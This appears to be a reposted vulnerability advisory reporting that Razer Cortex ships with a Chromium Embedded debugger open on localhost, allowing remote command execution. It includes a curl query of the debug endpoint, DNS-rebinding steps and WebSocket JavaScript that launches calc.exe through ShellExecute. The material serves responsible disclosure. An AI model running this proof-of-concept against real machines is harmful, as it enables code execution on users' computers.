Razer Cortex Debugger Remote Command Execution

Razer Cortex has a CEF debugger stub enabled by default allowing arbitrary remote command execution.

MD5 | 1d2152a1c114ec3e8cfb933b419a219c

Razer "Cortex" has CEF debugger stub enabled by default allowing arbitrary remote command execution. 

I was alerted on twitter that the software distributed by Razer for their gaming equipment might be unsafe, I downloaded the ones I could see online to take a look.

I have only looked at "Cortex", apparently some kind of system optimizer (frankly, the claims it makes seem dubious).

Cortex is a CEF (Chromium Embedded) application, and unbelievably they left the debugger running and enabled by default in production builds.

$ curl -si localhost:8088/json/list
HTTP/1.1 200 OK
Content-Type:application/json; charset=UTF-8

[ {
"description": "",
"devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)",
"id": "(A6E5587C41694A59DB4142D98362B4CA)",
"title": "Razer Game Deals - The best game deals on the web",
"type": "page",
"url": "<a href="https://deals.razer.com/?From=cortex&Userid=..." title="" class="" rel="nofollow">https://deals.razer.com/?From=cortex&Userid=...</a>",
"webSocketDebuggerUrl": "ws://localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)"
} ]

That is obviously exploitable, but the mechanics are pretty tricky.

Razer ship a module called RazerCortex.Modules.Deals.JsInteractions in RazerCortex.Modules.Deals.dll that contains a method JSOutBrowser.open(), that is passed directly to ShellExecute(), so you can use it for command execution.

1. Read the list of pages using DNS rebinding from <a href="http://localhost:8088/json/list" title="" class="" rel="nofollow">http://localhost:8088/json/list</a>
2. Open a WebSocket to the webSocketDebuggerUrl listed.

Do something like:

x = new WebSocket("ws://localhost:8088/devtools/page/(EBC04DF125124EC6E07D8CEA8A0470E8)")

x.send(JSON.stringify({"id":1,"method":"Runtime.enable"})) // Enable javascript evaluation
x.send(JSON.stringify({"id":2,"method":"Runtime.evaluate","params":{"expression":"RazerCortexOutBrowser.open(JSON.stringify({url: \"c:\\\\windows\\\\system32\\\\calc.exe\"}))"}})) // Run arbitrary commands.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Found by: taviso

Related Posts